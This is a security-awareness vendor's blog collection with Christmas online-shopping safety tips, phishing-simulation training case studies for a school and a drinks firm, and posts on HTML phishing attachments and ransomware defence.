Infosec Cloud
Solutions. Services. Training.

Stay Cyber-Safe this Christmas

Here’s a few tips to help you stay ‘cyber-safe’ at home over the holidays.

Download the list here >>

Watch out for fake websites

It’s very easy for cyber-criminals to create a spoofed website that looks like an official retailer and then offer ‘unbelievable’ deals. Once a payment is made you may receive inferior products, and that’s if they arrive at all. Remember to always check the URL of the website and look out for domain names that end in .net or .org.

Pay by credit card

Credit cards provide protection if things go wrong with a purchase. If the goods don’t show up or are faulty, and cost more than £100, Section 75 of the Consumer Rights Act means you can claim the money back.  For goods under £100, or payments made by debit card, you can ask your bank to recover the money through “chargeback”. Always be suspicious if a website asks you to make a bank transfer instead of paying by card.

Make sure the site is secure

Check for ‘https’ at the start of the website URL. The ‘s’ stands for secure. Look for a padlock on the left of the browser. If the padlock is on the page itself this is probably a spoofed website.

Beware of phishing emails

Phishing messages are designed to appear from trusted organisations such as your bank or HMRC, or familiar retailers like Apple, Tesco and Argos. They aim to trick you into revealing personal details. The emails usually contain links which when clicked download malicious software or take you through to a spoofed website where your personal details are requested.

Over the Christmas holidays, be very wary of emails from retailers offering deals or cash prizes. Check the email address and don’t click on any links embedded in the message. Even an “unsubscribe” link could be malicious.

Don’t trust Whatsapp messages offering gift cards

Whatsapp users have reported receiving messages offering Topshop and Sainsbury’s gift cards that appear to be sent from a phone contact. The link takes you through to an official looking site which requests personal details.

Clicking on the link would also allow cyber-criminals to collect personal information from your device that could track you. Delete messages like these even if they look like they’ve come from someone you trust and install security software on your device.

‘Freebies’ on Facebook

Free iPads, flights, shopping vouchers, Alton Tower tickets and cheap RayBan sunglasses all fall into the category of “if it looks too good to be true, it probably is”.

Cyber-criminals create attractive looking deals which they post on Facebook asking users to “like” and “share” the advert to boost it to the top of news feeds and target a wider audience. If you click through you will be asked for personal details which can be used for fraudulent purposes. The posts may appear to be from legitimate companies – check if the Facebook account is verified with a blue tick.

Avoid shopping on public Wi-Fi

Internet hotspots offered by coffee shops, libraries and bars may be incredibly convenient but are extremely vulnerable. A cyber-criminal can easily hack into the network and access your user details or set up their own fake hotspot. If you’re shopping or banking online use your own 3G/4G network or wait until you get home.

Don’t fall for the “Click and Receive” scam

Be suspicious of emails that ask you to click on a link and enter your details to rearrange a delivery. It won’t tell you what the item is but over the holiday period thousands of people are likely to have ordered something online and may be tricked into handing over personal information.

In some cases credit card details may be asked for to “verify” the delivery. Be suspicious if the email doesn’t tell you what the ordered goods are and if in doubt, retrace your order trail and make a call to the company you’re expecting a delivery from.

When shopping on eBay stick to the rules

There are various ways that eBay protects users – those who don’t stay within the guidelines will struggle to get their money back if they fall victim to a scam. Always pay by Paypal – most items will be protected by eBay’s Money Back Guarantee. Scammers will try and get you to pay by bank transfer or a service such as Moneygram. Do this and you forfeit your protection.

Also be wary of sellers contacting you directly to offer you a better deal than the listed price. Be careful of those with little or no selling history.

Watch out for fake customer reviews

More than half of UK adults use online review websites such as Amazon, Tripadvisor, Expedia and Checkatrade to find the best bargains.

But among the genuine reviews are millions of fakes. Be suspicious if too many of the reviews seem similar – it suggests they are being copied and pasted or written by the same person. It should raise a red flag if the reviews are all very new. If you are at all suspicious of the website avoid it.

If you think you’ve been a victim of a scam – act fast

If you’ve been conned call your bank immediately and ask them to try and stop the payment. The sooner you do this the more chance you have of getting your money back. Banks will only refund customers who have been defrauded on their credit card or debit card, or a transaction has been actioned without their authorisation. Call your bank yourself, not a phone number given to you in a possibly scam letter or email.

Banks are not responsible for reimbursing customers who have been deceived into making payments.

If action is taken swiftly and there are funds remaining in the cyber-criminal’s account your bank may be able to claw back it back if it requests an indemnity. If you feel your bank has not done enough to help you make a complaint and take it to the Financial Ombudsman to investigate. You should also report it to Action Fraud.

Websites for more information:

Get Safe Online: https://www.getsafeonline.org/

The UK’s leading awareness resource helping protect people, finances, devices and businesses from fraud, abuse and other issues encountered online.

Action Fraud: https://www.actionfraud.police.uk/

The UK’s national fraud and cyber-crime reporting centre. The easiest way to report fraud and cyber-crime is by using the online reporting tool.

Stay Vigilant and Stay Safe this Christmas Holiday Time!


Keep your employees cyber security aware in 2018: See our Security Awareness Training and Testing program >>

  • Employee GDPR Awareness Training

  •  Identity-as-a-Service (IDaaS) solution

  • Tokenless Strong Authentication (MFA)

  • Next Gen Endpoint Security

  • Enquiry LinkedIn Spiceworks

    Cyber Security Awareness Training & Testing (SATT) shortlisted for British Legal Awards

    Infosec Cloud is delighted to have been shortlisted for this year’s British Legal Awards. The company’s Security Awareness Training and Testing (SATT) managed service has been recognised as a finalist for the Supplier of the Year (Technology) Award.

    Organised by ‘Legal Week’, the awards will be judged by an independent panel of judges made up of senior in-house lawyers, former managing and senior partners and other senior business figures.

    Infosec Cloud’s entry focuses on the company’s Legal Sector Security Awareness Training and Testing (SATT) managed service, developed to stop IT End Users causing security incidents.

    Holding high value information and financial details, Legal Practices and Partnerships are particular targets for cyber criminals. Plus Firms have a high proportion of senior staff members who may be reluctant to follow corporate security procedures, and staff are under increasing time and workload pressures, making them even more vulnerable to today’s sophisticated cyber-attacks.

    To help the legal sector protect their data, clients and reputation, and following an in-depth market evaluation, Infosec Cloud developed their own fully managed Security Awareness Training and Testing (SATT) service. The service was launched in 2014.

    Today, nearly 80,000 IT End Users, across the UK, are enrolled on the Infosec Cloud SATT service. Legal customers include many of the top 200 law firms and all grade the service as ‘meets or exceeds expectations’ (quarterly satisfaction survey). The SATT service is applicable to organisations of all sizes, whether national or regional, plus the company is working with both LEXCEL assessors and Law Firm Networks.

    Commenting on the awards, Infosec Cloud Managing Director, Pete Sherwood says: “Being shortlisted for this award is great recognition for the service we have developed and the value it is providing to the Legal Sector in terms of keeping Firms and Partnerships cyber safe”.

    Security awareness training is not new, however the way that it is delivered, tracked and kept front of mind by Infosec Cloud is new. The SATT service comprises both training and ongoing testing with focused remedial training. The company has invested in a dedicated SATT team that researches, builds and tracks the simulated cyber-attacks, with bespoke content created for each customer.

    The SATT service is fully managed so that there are no additional time requirements for the IT team. Plus as an ‘independent’ third party, Infosec Cloud ensures all staff, regardless of seniority, are included.

    Click here for more information on the SATT service >>

    The British Legal Awards serve as a showcase for the achievements of one of the country’s most successful sectors. Hosted by Legal Week in association with The City of London Law Society, the glittering awards ceremony is attended by 1,000 lawyers, representing the cream of the UK’s legal community. This year’s ceremony will take place on Thursday 30 November at Finsbury Square, London EC2.

    More information on the Awards >>

    Infosec Cloud builds Staff Security Awareness at Poole Grammar School

    School achieves Top Marks for Staff Security Awareness Training & Testing.

    Infosec Cloud started working with Poole Grammar School (PGS) in early 2016, to train staff to spot fraudulent emails and websites, and to be alert to the full range of today’s potential cyber attacks.

    After a very succesful 12 months of providing Cyber Security Awareness Training & Testing (SATT), PGS has recently renewed the service for another year. All training materials and phish tests are continually updated to reflect current day threats, so continuing the service will ensure staff remain fully alert and vigilant.

    Having successfully completed 12 months of training and testing, PGS staff are pro-actively helping to protect the school plus its connected suppliers, partners and families.

    PGS is a selective, boys’ grammar school and academy in Poole, Dorset. The school has 1200 pupils, aged 11 to 18, with an appropriately sized teaching, support and leadership team. IT Network Manager, Jeff Hay, was acutely aware of the risk of potential cyber security attacks on the school. Attacks that could result in criminal access to confidential information or the launch of a costly ransomware attack.

    In fact in January 2017, Action Fraud, the UK’s fraud and cybercrime centre, reported that cyber criminals were targeting UK schools, demanding payments of up to £8,000 to unlock data they had encrypted with malware.

    With the increasing frequency and sophistication of cyber attacks, the biggest threat is actually people’s lack of information and naivety. It can take just one click to compromise an entire school’s networks and data.
    Jeff Hay, IT Network Manager, Poole Grammar School.

    However, working at one of the country’s top schools, Jeff understood that training alone is not enough. Day to day behaviour can only be changed by a combination of training and targeted testing. The very fact that staff know they will be tested makes sure they remain extra vigilant so as not to be ‘caught out’.

    That’s why PGS selected Infosec Cloud to provide their fully managed Cyber Security Awareness Training & Testing service.

    Fully Managed Service:

    Infosec Cloud provides PGS with cyber security awareness training and testing as a fully managed service. This ensures all staff, from the Head Teacher down, are included in the program. All PGS needed to do was to provide Infosec Cloud with an excel spreadsheet of staff names and email
    addresses.

    Integrated 12 month program:

    High quailty, bite-sized video training is delivered online at the desktop, with an integrated 12 month program of bespoke test phishing emails.

    Vulnerable staff who fall for the emails after the initial training, are provided with immediate, relevant remedial training.

    The training has heightened everyone’s awareness and hopefully staff will delete the threat before we have to fall back on PC security, Antivirus, or in the worst case, backups. Even better is that the staff now know how to respond if they have opened an attachment or followed a suspect link. This gives the IT Team a fighting chance of nullifying the threat!
    Jeff Hay, IT Network Manager, Poole Grammar School

    The 12 month program comprises:

    1. Initial baseline phishing email test
    2. 15 minute Video Training for all staff – delivered online
    3. 11 month program of random test phishing emails
    4. 40 minute remedial training for vulnerable staff members (those who still click after the training)
    5. Monthly reports and full program management

    Infosec Cloud also provided internal communications for school staff explaining the training and testing process, and why everyone needs to remain vigilant at all times, plus guidelines for Jeff to handle any staff concerns.

    Results and Reports

    All staff were trained within the first three months and after training the average click rate was reduced to 4%, down from the initial baseline of 55%.

    Jeff receives monthly updates detailing the staff training status and who has clicked on deceptive links, opened potentially malicious attachments and entered logon credentials to spoofed landing pages. All this information remains confidential and is only used to provide vulnerable staff members with additional training.

    Download a copy of the full case study >>

    Read more about Security Awareness Training & Testing >>

    2016 Research – Cyber Attacks on Law Firms Increasing

    73% of top 100 law firms targeted in 2016

    The 2016 PwC Law Firms Survey reports that an increasing number of security incidents are being experienced across the UK legal sector. The research found that 73% of the UK top 100 law firms were the target of attacks last year.

    Although larger firms are the greatest target, all law firms are targets for cyber-crime due to the confidential information held and the large volume of client funds retained. The very nature of law firms makes them an attractive target.

    Key findings:

    *  Information security is a significant area of risk to the legal industry with 73% of all law firms reporting they had suffered from a security incident.
    *  The most common incidents relate to phishing attacks (malicious emails) and infection by viruses/malicious software, with 84% and 55% of firms respectively stating they have suffered one such incident during the past 12 months.
    *  Whilst there is an increasing threat from outsiders, 41% of all law firms report that they have suffered incidents as a result of their own staff.

    Security awareness training and and simulated, random cyber-attack testing is proven to actually change staff behaviour and build a human firewall of vigilant, empowered employees.

    Download the Legal Sector Guide to Security Awareness Training and Testing (SATT) >>

     

     

    New Ransomware Simulator

    How Vulnerable Is Your Network? Find out with this new Ransomware Simulator.

    Request a copy of this new, free tool to see if your network is effective in blocking ransomware – just in case your employees fall for social engineering attacks.

    The Ransomware Simulator “RanSim” gives you a quick look at the effectiveness of your existing network protection.

    RanSim will simulate 5 ransomware infection scenarios and show you if a workstation is vulnerable to infection. RanSim is complimentary; there are no costs.

    This will take around five minutes, and may give you some insights you never expected…

    Contact our security awareness technical team at: [email protected] to request your copy of the Ransonware Simulator.

    If you then find that your AV is not blocking any of the 5 scenarios, contact Infosec Cloud to learn more about Next Generation Endpoint Protection and our fully Managed End User Security Awareness Training and Testing Service:

    Next Gen Endpoint Security >>

    Security Awareness Training & Testing >>

    Are employees your greatest risk?

    The Business Debate: Can the greatest asset of a business also be one of its greatest risks?

    Interview with Paul Hopkins, Technical Director, Institute of Risk Management.

    The Business Debate – IRM’s vision for Risk Management
    The Debate Biz.

    Minimise ‘people risk’ with Security Awareness Training and Testing >>

    Luscombe Drinks refreshes staff Security Awareness

    Luscombe Drinks invests in end user IT Security Awareness Training and Testing, to protect both their own data and networks, and those of their connected suppliers and customers.

    Luscombe is ensuring all their employees are informed, empowered and vigilant against today’s online and physical cyberattacks with company-wide Security Awareness Training and Testing.

    Luscombe is aware that not only could sensitive or confidential data, such as details of their recipes and processes, be breached, but that a ransomware attack could result in major operational disruption with subsequent loss of business, customers and reputation.

    The company has been producing quality fruit drinks since 1975. All drinks are crafted with exceptional care and integrity. There are no compromises, only the best goes in the bottle.

    When Luscombe decided to train their employees to be security aware, they contacted Infosec Cloud to deliver their fully managed end user Security Awareness Training and Testing (SATT) service.

    Fully Managed Service

    Infosec Cloud provides the training and testing as a fully managed service. This ensures all employees, including the IT team and senior management, are included in the programme. All Luscombe needed to do was to provide Infosec Cloud with an excel spreadsheet of employee names and email addresses.

    Integrated 12 Month Programme

    Infosec Cloud is delivering the video-based interactive online training with an integrated 12 month programme of random test phishing emails. Vulnerable employees who fall for the emails after the initial training, are provided with immediate, remedial training.

    The 12 month programme comprises:

    1.    Initial baseline phishing email test
    2.    15 minute Video Training for all employees – delivered at the desktop
    3.    11 month programme of random test phishing emails
    4.    40 minute remedial training for vulnerable employees (those who click)
    5.    Monthly reports and full programme management

    Infosec Cloud provided Luscombe with internal communications explaining the training and testing process, and why employees need to remain vigilant at all times, plus guidelines for the IT Helpdesk, used to handle any employee concerns.

    Wayne Martin, IT & Engineering Manager, Luscombe Drinks said: “There are many companies offering Security Awareness Training, however the Infosec Cloud programme is different, and has actually changed our employees’ behaviour. The combination of training and simulated cyber-attacks, such as phishing emails, is certainly keeping us all on our toes.

    Training Videos

    Within two months, all Luscombe employees had completed the training. The training videos, delivered at the desktop, include real-life examples and scenarios. The videos can be paused and replayed as needed, and cover:

    1.    Your Role – Internet Security and You
    2.    Common Traps – How Criminals Try to Trick You
    3.    Red Flags – Warning Signs That Alert You
    4.    Danger Zone Exercise – Find the Red Flags

    Wayne Martin continued: “Our employees all liked the training videos as they were able to watch them at their own pace and when most convenient. They are now applying this knowledge in their day to day jobs.”

    Security Awareness Training and Testing helps build a human firewall. Interactive training is delivered at the desktop and reinforced with random, simulated test cyberattacks, such as tailored phishing emails.

    Now at month four, the Luscombe Drinks employee’ phishing email click through rate is down to zero. The testing and training cycle will continue, with users seeing different phishing emails, every month, at random. There may be some further ‘clicks’ however the trend should be a constant, low click rate.

    The results show how a combination of web-based training and frequent simulated phishing attacks really works.

    Luscombe Drinks has found that a small investment in end user Security Awareness Training and Testing means they can safely concentrate on doing what they do best, making drinks that are a real pleasure to taste.

    About Luscombe Drinks
    Luscombe Drinks has been making beautiful drinks since 1975. Based on a farm in deepest Devon, all of the drinks are crafted with exceptional care and integrity. Gabriel David, the head of the family-owned business, sources the ingredients direct from growers he trusts. There are no compromises, only the best goes in the bottle. http://www.luscombe.co.uk/

    Find out Security Awareness Training and Teating can help you build a human firewall >>

    Hidden Dangers of HTML Attachments

    Over the last six to nine months, we’ve seen a lot of .DOC and .JS file attachments as malicious attachments, used for mainly ransomware attacks.

    However, our researchers have spotted an up and coming trend; malicious HTML “attackments” that are used for credentials phishing. Cyber criminal are using .HTML attachments to spoof bank login pages, popular online services and secure messages from financial institutions.

    There are a couple reasons why the cyber criminals have taken a liking to HTML

    1. Reduced chance of AV detection

    Carefully crafted .HTML files can reduce the chances that phishing emails sporting those attachments will be stopped by email security software or devices. While .EXE and Office files (.DOC, .XLS, etc.) pose obvious threats in a Windows environment and have a long history of being used in malspam (malicious spam email), .HTML files are not commonly associated with email-borne attacks — at least not recently (several years ago they were being used to deliver malicious Javascript). Moreover, .HTML files can be used to embed URL redirects to evade AV scanners that check only URLs that appear in the bodies of emails. HTML files can also be used to deliver obfuscated web pages (usually base64 encoded) that might slip past even scanners that do check .HTML attachments.

    2. User familiarity

    Although your users and employees may not recognise the potential threat of .HTML attachments, that doesn’t necessarily mean they aren’t familiar with them. HTML attachments are commonly used by banks and other financial institutions to deliver secure documents and messages as well as to enable users to conduct banking business in a secure environment.

    User Education is your best defence:

    Inevitably, your filters are going to miss some of these, and we suggest you send the following to your employees as part of your ongoing awareness campaign:

    Internet criminals never stop trying to get past our spam filters and trick you into clicking on phishing links or opening malicious email attachments.

    This is a warning against a new type of attack that uses an HTML attachment which tries to scam you into entering your user name and password.

    HTML attachments are often used by banks for secure messages, so you might think that these are always safe. They are NOT. If you get an email with an HTML attachment, be just as careful as always and do not open it unless you have asked for it, or have verified with the sender that the attachment is legitimate.

    Remember: Always Think Before You Click!

    Regular Security Awareness Training is critical to ensuring that your employees recognise and correctly respond to the actual threats they will encounter. Find out how affordable this is for your organisation  – less than £1/user/month.Get a Quote orange button image

    If you do not like to click on redirected buttons, here is a link you can cut and paste:
    http://www.infosec-cloud.com/security-awareness/free-security-awareness-training-quote/

    Ransomware: User Education is First Line of Defence

    Guest post: Mike Gillespie, director of cyber research and security at The Security Institute

    What is the best strategy for business to protect against ransomware?

    Ransomware has yet again reared its ugly head and despite various security websites issuing warning notices, people are still falling foul of it.

    Ransomware is, in essence, a method of extorting money from an unsuspecting individual or organisation, most frequently by denying them access to their files through encryption of their data or hard drive.

    One ransomware attack vector is via phishing or spam emails as the unsuspecting individual may inadvertently open an attachment or follow what they perceive to be abona fide web link.  The act of clicking on the suspicious attachment or web link results in the initiating of a malware download, which then encrypts the user’s files or hard drive. Once completed, this then requires the user to pay.

    Payment is often demanded in Bitcoin to unlock an organisation’s files or hard drive. It has been widely reported by victims that despite paying this “ransom”, they have still been unable to access the encrypted files or hard drive. So it is clear that prevention is better than cure when dealing with ransomware.

    Depending on the type and version of ransomware that has been installed, there is a possibility that the user’s files or hard drive have not actually been encrypted, but a small piece of software has been installed that gives the impression that encryption has taken place.

    This relies heavily on the emotional response of the victim and the fear that they could be compromised; such a fear is enough to prompt a response and, potentially, payment.

    It is impossible to tell from the ‘splash screen’ that appears whether or not it is a genuine ransomware payload and only an attempt to use or recover the user’s files will clarify this.

    Numerous strategies

    There are numerous strategies for safeguarding against ransomware. The first, and by far the most effective, is user awareness and education, because ransomware does not install itself. For the malware to be downloaded successfully, it needs some form of user interaction, whether via phishing emails or by fraudulent websites that serve up ‘drive-by’ malware.

    Ensure that all your staff, including management, recognise phishing and spam and so do not open suspicious emails or follow links to other websites unless they can be sure they are bona fide links. All users should also be cautious or even suspicious of attachments, pictures or graphics received unexpectedly from known persons, because the sender’s email account may have been compromised.

    If in doubt, do not open any email without first confirming its origin by contacting the sender. It is also recommended to switch off any email preview window within a mail program because this may trigger the ransomware download.

    Also, spear phishing might be used for a targeted ransomware attack on a specific user. This might make the malicious email hard to spot.

    Scan all attachments

    Secondly, ensure that any antivirus email program or software is up to date and scheduled to scan all email traffic to identify spam emails or emails that may contain known threats. This software should also be configured to scan all attachments or pictures embedded within emails or instant messaging attachments.

    Thirdly, all hardware and software should be correctly patched and updated to the latest version to ensure that all known weaknesses or vulnerabilities have been addressed by the relevant supplier.

    Finally, a good back-up regime is essential in this ever-changing virtual and internet-based environment. Remember, it is not sufficient just to make backups because they need to be tested to ensure they actually work.

    In the event of your system being infected with ransomware, don’t give up hope or pay any ransom. There are various products available that can help to recover your files.

    It is imperative that organisations take the threat of ransomware seriously. Once infected, the inability to access files or systems may affect other services offered by the organisation. An organisation’s ability to recover quickly from any ransomware infection will be greatly enhanced by having effective business continuity mechanisms available and free from infection.

    This article was first published in Computerweekly.com in February 2016

    Read more about End User Security Awareness Training >>

    Phishing emails and bogus contact: HMRC examples

    If you think you have received a HM Revenue and Customs (HMRC) related phishing / bogus email or text message, you can check it against the examples shown in a free HMRC Guide.

    Download the HMRC Guide Here >>

    It will assist HMRC investigations if you report all ‘HMRC related’ phishing emails and bogus text messages to HMRC. Even if you receive the same / similar phishing email or text message on multiple occasions, please forward it to [email protected] and then delete it.

    Do not open any attachments or click on any links within the email or text message, as they may contain malicious software or direct you to a bogus website.

    End User Security Awareness Training – at less than £1/user/month

    Now is the time to invest in Security Awareness Training, so that your end users understand the mechanisms of:

    • ✓ Spam
    • ✓ Spear Phishing
    • ✓ Pop ups
    • ✓ Malware
    • ✓ Social engineering
    • ✓ Phishing
    • ✓ Website Security
    • ✓ Adverts
    • ✓ Ransomware
    • ✓ Physical security

    The consequences of failing to do so go well beyond bad headlines. One significant data breach can lead to lost jobs, substantial legal costs, non-compliance penalties, loss of brand reputation, customer loss, and a catastrophic hit on the bottom line. You only need to read the latest news to see why it is imperative that you take action today to protect your company and your employees.

    Every company needs to invest immediately in results-driven security awareness training for all employees – from the CEO down…

    Infosec Cloud provides fully managed Security Awareness Training reinforced by frequent simulated, randomised cyberattacks to help organisations create cultural change and build a human firewall.

    Click here to request your free Quote >>